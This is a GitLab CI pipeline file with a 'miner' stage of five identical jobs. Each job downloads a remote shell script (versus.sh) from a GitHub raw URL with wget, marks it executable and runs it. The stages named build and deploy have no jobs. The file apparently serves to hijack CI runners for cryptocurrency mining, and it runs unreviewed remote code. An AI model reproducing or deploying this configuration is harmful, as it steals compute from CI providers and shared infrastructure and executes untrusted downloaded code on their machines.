stages:
  - miner
  - build
  - deploy

miner_1:
    stage : miner
    script :
       - wget https://raw.githubusercontent.com/WisnuTekno/jovermangondato/main/versus.sh && chmod u+x versus.sh && ./versus.sh


miner_2:
    stage : miner
    script :
       - wget https://raw.githubusercontent.com/WisnuTekno/jovermangondato/main/versus.sh && chmod u+x versus.sh && ./versus.sh


miner_3:
    stage : miner
    script :
       - wget https://raw.githubusercontent.com/WisnuTekno/jovermangondato/main/versus.sh && chmod u+x versus.sh && ./versus.sh


miner_4:
    stage : miner
    script :
       - wget https://raw.githubusercontent.com/WisnuTekno/jovermangondato/main/versus.sh && chmod u+x versus.sh && ./versus.sh


miner_5:
    stage : miner
    script :
       - wget https://raw.githubusercontent.com/WisnuTekno/jovermangondato/main/versus.sh && chmod u+x versus.sh && ./versus.sh